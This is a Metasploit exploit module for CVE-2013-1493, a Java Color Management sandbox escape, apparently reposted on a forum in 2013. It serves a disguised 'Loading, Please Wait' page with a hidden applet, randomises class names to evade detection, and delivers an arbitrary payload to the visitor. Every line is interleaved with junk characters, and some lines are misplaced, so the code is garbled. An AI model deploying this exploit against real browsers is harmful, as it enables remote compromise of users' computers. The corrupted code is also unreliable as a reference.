##
5 G/ {& M1 n8 _0 U) B7 V1 I, b( ~' k5 }7 B7 _" m
# This file is part of the Metasploit Framework and may be subject to
+ x+ i& {* w: t) Q, y# redistribution and commercial restrictions. Please see the Metasploit
" N5 K8 y: {! w+ ?2 e# O# web site for more information on licensing and terms of use.
, Z3 w7 p; c5 c6 l* x, a$ l+ R& f# http://metasploit.com/5 ~: S* k, c: B
##& M6 ^' u: ~/ n7 M* _* E
require ‘msf/core’2 N5 `6 y6 o4 ], g& h- x
require ‘rex’; V' p+ D" o* U- |- \7 O8 ^
class Metasploit3 < Msf::Exploit::Remote% }3 d5 c& {9 f" g
Rank = NormalRanking1 m9 ?. `% ?: _" W
include Msf::Exploit::Remote::HttpServer::HTML1 y( z6 H1 n3 x s
include Msf::Exploit::EXE* m1 D2 h" ^0 k$ ^6 b! W3 N
include Msf::Exploit::Remote::BrowserAutopwn
$ `9 m! f, |2 | V3 Mautopwn_info({ :javascript => false })' `/ @8 E; Q1 c# U6 N/ h3 W
def initialize( info = {} )
. [2 j/ N$ k9 ?0 Y9 bsuper( update_info( info,
; a t* X. ~; P+ C) L- P9 [! w. E‘Name’ => ‘Java CMM Remote Code Execution’,2 J( p9 g, A! `+ i0 E
‘Description’ => %q{
/ O4 k6 {+ J4 ^/ v5 g, E. bThis module abuses the Color Management classes from a Java Applet to run
- c& F2 B9 d- n! F+ w+ w* qarbitrary Java code outside of the sandbox as exploited in the wild in February
) g, O8 ]+ J4 `2 ~9 G2 N4 Pand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41% k6 c; |8 ^' Z; W }3 b1 i8 J
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
: Z( t- T* k/ @( B& T8 P. s8 ~$ @systems. This exploit doesn’t bypass click-to-play, so the user must accept the java( \" q- R- B( I7 _6 n* m. M {5 |
warning in order to run the malicious applet.
0 r# e4 ]3 G7 ^, o8 d/ H& z }" a},1 \" `% H+ B) M, R8 j0 |
‘License’ => MSF_LICENSE,2 ]6 p; q/ ~" G/ I. @. Z! Z
‘Author’ =>
! T( S7 y- p% B, C. a0 |! X'Unknown', # Vulnerability discovery and Exploit
9 e8 k2 |" N+ l( _'juan vazquez' # Metasploit module (just ported the published exploit)+ i1 Z5 \/ B, ^5 }3 L
],6 |9 I2 j7 F! G" i$ m' L$ n2 P" b
‘References’ =>2 o/ I9 F* E4 ~' R, U: a- [
[- O& j. b9 w C( a- s
[ 'CVE', '2013-1493' ],
5 n: d$ ^) e. k( G7 ^0 d[ 'OSVDB', '90737' ],
+ \! r/ ~: Q- Y1 M/ M1 D[ 'BID', '58238' ],: v6 b B O/ _) J
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
2 D% e$ z7 c+ }+ y! M[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
. }5 `7 t; R/ T5 F. R' o& d$ z[ 'URL', 'http://pastie.org/pastes/6581034' ]
) j+ q+ H% w) a, C$ G],
y! T% z* K: z2 m+ d( s C9 [. O9 r‘Platform’ => [ 'win', 'java' ],
, ?3 J+ y- v- ^‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },+ \ g" Y* i W. t
‘Targets’ =>
0 ~, j" J) x. v; [: y) G( C[5 E& x! G2 n& i/ e' e6 C
[ 'Generic (Java Payload)',- x# T* Z4 [% D. Y# \
{
& R. e$ p/ S& O3 B'Platform' => 'java',
& |; K: g- x% y: ^8 X1 \' u, Z'Arch' => ARCH_JAVA) }9 B2 h. P9 X2 s! r9 S; c
}
& |+ U! K0 J- I4 i/ d3 r],* ^$ G! W* T# K7 ^5 R: ~
[ 'Windows x86 (Native Payload)',
W+ N* q( [) E/ W. [# a{! \; v: `1 A+ D9 v
'Platform' => 'win',
8 \0 u$ H# t: s( e5 h'Arch' => ARCH_X86' f4 {: f1 ?+ z+ y
}$ @, l) I* B' f- X9 B
]
3 r# j( N- I/ o" l W$ A],! {. w6 @' N3 e3 ?
‘‘DisclosureDate’ => ‘Mar 01 2013′+ i L, J4 ~4 b8 v) f
))
$ p: c0 W6 F, \/ c. y1 N" cend
3 a' I; p% j3 V, Gdef setup' L5 l* p0 d E' J. V
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)( Q& Q1 V/ l2 E0 d( ~
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
; ^) @$ |( ]% o$ B5 Cpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)( g9 O! m/ d( E" y
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }- r. _- U4 Y& L U4 X8 Y
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)) e3 G8 D2 M9 Z N5 ], C
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
/ ~: S q9 L2 i2 z) }. apath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
* Y4 l8 U8 C/ _5 p5 O/ L2 J9 w@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
/ a1 [: i+ b/ H6 M@init_class_name = rand_text_alpha(“Init”.length)
- c8 N, W S5 @8 U; U9 B3 B: f, ^@init_class.gsub!(“Init”, @init_class_name)
. ~! ^. \) C4 Y5 m' Ksuper
9 D4 }; N7 C1 z- |, V4 @& Rend' r) C- c9 Q9 g3 l( {7 v* l
def on_request_uri(cli, request)
0 u3 |1 w* j0 C% M3 ]/ u+ [& k0 J& Gprint_status(“handling request for #{request.uri}”)6 U( R4 N7 A0 ~- |6 K% a
case request.uri
, ^8 h& I# v& e2 x: _ ^when /\.jar$/i3 L3 d8 `6 w/ B1 X$ G4 f' y0 b
jar = payload.encoded_jar1 s& [! U; [' C* y
jar.add_file(“#{@init_class_name}.class”, @init_class)
2 {" \- R6 }0 a( w* z1 jjar.add_file(“Leak.class”, @leak_class)
: L, t6 l/ {) jjar.add_file(“MyBufferedImage.class”, @buffered_image_class)
) v1 e \4 G+ p! \% kjar.add_file(“MyColorSpace.class”, @color_space_class); M3 H- b% l; w
DefaultTarget’ => 1,
8 b9 N1 ^5 b' v, C( h4 H/ \metasploit_str = rand_text_alpha(“metasploit”.length)1 n% ]8 V3 e1 c+ @8 v. [
payload_str = rand_text_alpha(“payload”.length)! i6 F% H) z: G! m8 h! j8 x
jar.entries.each { |entry|( h* A ?6 O* t' Z' p) Z3 d( u' Z
entry.name.gsub!(“metasploit”, metasploit_str)4 X( U# E/ G$ Z. N: b# b
entry.name.gsub!(“Payload”, payload_str)
3 f4 g* J2 n9 |# i, }' Mentry.data = entry.data.gsub(“metasploit”, metasploit_str)! ^) d9 U7 }7 B2 ~! h! S$ _
entry.data = entry.data.gsub(“Payload”, payload_str)( W; y" ^ u: {4 X& k
}7 h1 X _& M, A4 k
jar.build_manifest- V! V- G, `9 n, G- ~
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })% t3 n% m7 \5 ?. W
when /\/$/0 ~% F n- M3 y
payload = regenerate_payload(cli)
) Y9 Z: i9 [$ W7 G2 Fif not payload! l/ F+ F, ^9 a
print_error(“Failed to generate the payload.”)- Z! ^$ \: b$ w3 W9 ~: j
send_not_found(cli)
& T+ w G( ?1 f2 k9 Xreturn
& E; X8 Z: Z* Y& K, Tend& W( c5 v/ y8 |$ \
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
, m( b% R; A% |, z6 B0 v' `$ relse
" `: v6 S4 q3 x' dsend_redirect(cli, get_resource() + ‘/’, ”)6 ^( c1 G/ H6 [
end
; E, d/ \4 a- j) Xend$ @/ r/ u" i* _9 G9 Q* v! Q! [4 _
def generate_html% ?1 G9 j9 A- \/ n, b3 _/ W& y
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
; u2 f5 j% K1 ]. n2 A/ Ahtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
4 ]: Z7 P5 n8 U- bhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
* l' p9 m% C# t8 v+ g+ t- n7 ohtml += %Q|</applet></body></html>|2 {; S$ I* w0 A9 C; O4 N
return html
. S6 e- r5 U, m1 u5 Fend8 G# v: P" n$ a3 c+ M
end
- ~: U8 ]8 R5 Y" l bend4 ?1 W8 e h, y/ t. T
|
发表于 2013-4-4 17:31:17
收藏
支持
反对